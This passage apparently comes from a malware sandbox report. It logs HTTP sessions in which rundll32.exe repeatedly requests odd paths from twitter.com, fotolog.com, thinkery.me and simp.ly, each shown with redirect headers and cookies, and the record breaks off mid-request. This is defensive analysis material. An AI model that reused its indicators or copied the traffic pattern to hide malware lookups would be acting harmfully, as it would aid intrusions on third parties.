                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                18192.168.2.649766104.244.42.180C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:17.500819921 CET1721OUTGET /np8j7ovqdl HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: twitter.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:17.667958021 CET1721INHTTP/1.1 301 Moved Permanently
                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                content-length: 0
                                                                                                                                                date: Mon, 22 Feb 2021 22:44:17 GMT
                                                                                                                                                location: https://twitter.com/np8j7ovqdl
                                                                                                                                                server: tsa_f
                                                                                                                                                set-cookie: personalization_id="v1_eMW/pvmkw91uzw656V0/bQ=="; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:44:17 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                set-cookie: guest_id=v1%3A161403385760206849; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:44:17 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                x-connection-hash: 855f3ec11189d02ee575242037c65fa5
                                                                                                                                                x-response-time: 111


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                19192.168.2.649769172.67.204.15680C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:18.387156010 CET1733OUTGET /vz1g3wmwu HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: www.fotolog.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
                                                                                                                                                Feb 22, 2021 23:44:19.065728903 CET1734INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:19 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                Expires: Mon, 22 Feb 2021 23:44:18 GMT
                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                Location: https://www.fotolog.com/vz1g3wmwu
                                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                cf-request-id: 086d83477800000c255f3b7000000001
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=LqKvumAtGJ3W98UVjgY4GagMWtlyFWINWQQhpMj3hKcVzdlQWsvFISAbqZd73Ix%2BgAgkcK98Yi%2FoYVh2scL%2FuZleTPfoprKLLLDnmPhIN6c%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 625c3b1f2bd90c25-AMS
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                2192.168.2.649722104.244.42.180C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:43:59.290610075 CET1280OUTGET /np8j7ovqdl HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: twitter.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:43:59.450372934 CET1281INHTTP/1.1 301 Moved Permanently
                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                content-length: 0
                                                                                                                                                date: Mon, 22 Feb 2021 22:43:59 GMT
                                                                                                                                                location: https://twitter.com/np8j7ovqdl
                                                                                                                                                server: tsa_f
                                                                                                                                                set-cookie: personalization_id="v1_tc34CJ9rst6/wckewc8pyw=="; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:43:59 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                set-cookie: guest_id=v1%3A161403383938834678; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:43:59 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                x-connection-hash: fbd68223ec8f5c8aa306893a8715c65f
                                                                                                                                                x-response-time: 101


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                20192.168.2.6497715.9.110.8480C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:20.055185080 CET1782OUTGET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: thinkery.me
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:20.123725891 CET1783INHTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:20 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://thinkery.me/billywilliams/5a0170161cb602262f000d2c
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                21192.168.2.649773192.0.84.24780C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:20.890939951 CET1794OUTGET /publish/pBn8Jt HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: simp.ly
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:21.059859037 CET1794INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:20 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 138
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://app.simplenote.com/publish/pBn8Jt
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                22192.168.2.649775104.244.42.180C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:21.731353998 CET1803OUTGET /np8j7ovqdl HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: twitter.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:21.896842003 CET1804INHTTP/1.1 301 Moved Permanently
                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                content-length: 0
                                                                                                                                                date: Mon, 22 Feb 2021 22:44:21 GMT
                                                                                                                                                location: https://twitter.com/np8j7ovqdl
                                                                                                                                                server: tsa_f
                                                                                                                                                set-cookie: personalization_id="v1_jKDkCpd2Tho5qIWShTgEcA=="; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:44:21 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                set-cookie: guest_id=v1%3A161403386182607736; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:44:21 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                x-connection-hash: a767f5c805908bb22fdbacbda13ba115
                                                                                                                                                x-response-time: 107


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                23192.168.2.649778172.67.204.15680C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:22.592783928 CET1815OUTGET /vz1g3wmwu HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: www.fotolog.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
                                                                                                                                                Feb 22, 2021 23:44:23.082896948 CET1816INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:23 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                Expires: Mon, 22 Feb 2021 23:44:22 GMT
                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                Location: https://www.fotolog.com/vz1g3wmwu
                                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                cf-request-id: 086d8357e600004c1fcbba0000000001
                                                                                                                                                Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=kH4%2FmGLB%2F0FU5zrBaR193kXOpR%2Fe7rOuOYc%2BzYyK%2BusDfxJmt19iKarvxgvZ2L7Yo1bbhtZk65Nmoh7pEejOl9PMIpiLU%2F%2FTNv8J02KXi3E%3D"}]}
                                                                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 625c3b3978e64c1f-AMS
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                24192.168.2.6497805.9.110.8480C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:23.967876911 CET1863OUTGET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: thinkery.me
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:24.039211035 CET1863INHTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:24 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://thinkery.me/billywilliams/5a0170161cb602262f000d2c
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                25192.168.2.649784192.0.84.24780C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:24.818103075 CET1894OUTGET /publish/pBn8Jt HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: simp.ly
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:24.982593060 CET1894INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:24 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 138
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://app.simplenote.com/publish/pBn8Jt
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                26192.168.2.649786104.244.42.180C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:25.622230053 CET1903OUTGET /np8j7ovqdl HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: twitter.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:25.791949987 CET1904INHTTP/1.1 301 Moved Permanently
                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                content-length: 0
                                                                                                                                                date: Mon, 22 Feb 2021 22:44:25 GMT
                                                                                                                                                location: https://twitter.com/np8j7ovqdl
                                                                                                                                                server: tsa_f
                                                                                                                                                set-cookie: personalization_id="v1_OvLJDZOAOfRSuy/p8Ryn1A=="; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:44:25 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                set-cookie: guest_id=v1%3A161403386572398439; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:44:25 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                x-connection-hash: 7e44620e4346c1f20bdee826d74de424
                                                                                                                                                x-response-time: 113


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                27192.168.2.649789172.67.204.15680C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:26.483916998 CET1915OUTGET /vz1g3wmwu HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: www.fotolog.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
                                                                                                                                                Feb 22, 2021 23:44:27.175228119 CET1916INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:27 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                Expires: Mon, 22 Feb 2021 23:44:26 GMT
                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                Location: https://www.fotolog.com/vz1g3wmwu
                                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                cf-request-id: 086d83671b00000bf1a71b9000000001
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=MmUDGnDLXHCvorqPxxV8g90MKXhrVjj%2FYLZ6iRN9p533iCDvja6RaD8JphOUfLsuAdHf36cFyn58MCmmKecdeN7Km1bv0%2FFD%2FmjIPF92ohk%3D"}],"max_age":604800,"group":"cf-nel"}
                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 625c3b51cca10bf1-AMS
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                28192.168.2.6497915.9.110.8480C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:28.277803898 CET1963OUTGET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: thinkery.me
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:28.351417065 CET1963INHTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:28 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://thinkery.me/billywilliams/5a0170161cb602262f000d2c
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                29192.168.2.649793192.0.84.24780C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:29.193248987 CET1975OUTGET /publish/pBn8Jt HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: simp.ly
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:29.362917900 CET1975INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:29 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 138
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://app.simplenote.com/publish/pBn8Jt
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                3192.168.2.649727172.67.204.15680C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:00.437108040 CET1312OUTGET /vz1g3wmwu HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: www.fotolog.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:00.891233921 CET1324INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:00 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Set-Cookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840; expires=Wed, 24-Mar-21 22:44:00 GMT; path=/; domain=.fotolog.com; HttpOnly; SameSite=Lax
                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                Expires: Mon, 22 Feb 2021 23:44:00 GMT
                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                Location: https://www.fotolog.com/vz1g3wmwu
                                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                cf-request-id: 086d83015a0000faa44b30f000000001
                                                                                                                                                Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=JDYtKzEly6dMv1uzYiAlNQ2gcH5yNHs5zqAkDDU%2Bu%2BuaJsywx%2FCFugY9DEJyowkvauujFnqHvM3ZbOJuXMJ%2FBfxTmSp5VhfZWKnN6gaz3Pc%3D"}],"max_age":604800}
                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 625c3aaefc0cfaa4-AMS
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                30192.168.2.649795104.244.42.180C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:30.292388916 CET1981OUTGET /np8j7ovqdl HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: twitter.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:30.458415031 CET1981INHTTP/1.1 301 Moved Permanently
                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                content-length: 0
                                                                                                                                                date: Mon, 22 Feb 2021 22:44:30 GMT
                                                                                                                                                location: https://twitter.com/np8j7ovqdl
                                                                                                                                                server: tsa_f
                                                                                                                                                set-cookie: personalization_id="v1_pa2OSIAbmqrW3MMXLl4tYA=="; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:44:30 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                set-cookie: guest_id=v1%3A161403387039350635; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:44:30 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                x-connection-hash: a2879c09cc3bc790b21c11821340a798
                                                                                                                                                x-response-time: 109


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                31192.168.2.649798172.67.204.15680C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:31.998774052 CET1993OUTGET /vz1g3wmwu HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: www.fotolog.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
                                                                                                                                                Feb 22, 2021 23:44:32.458513975 CET1994INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:32 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                Expires: Mon, 22 Feb 2021 23:44:32 GMT
                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                Location: https://www.fotolog.com/vz1g3wmwu
                                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                cf-request-id: 086d837ca50000fa707c891000000001
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=JAHy4U8Iq%2B3LPlypOoyL8ZLLuq0e2xCns2GdHhfruUULuEN3js3jrDZyRmPra9ky40qXQRLwXXGqQWXZBFXlX1UTe6D6yha7ybQF7%2FWsQyA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 625c3b7439cdfa70-AMS
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                32192.168.2.6498005.9.110.8480C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:33.550338984 CET2040OUTGET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
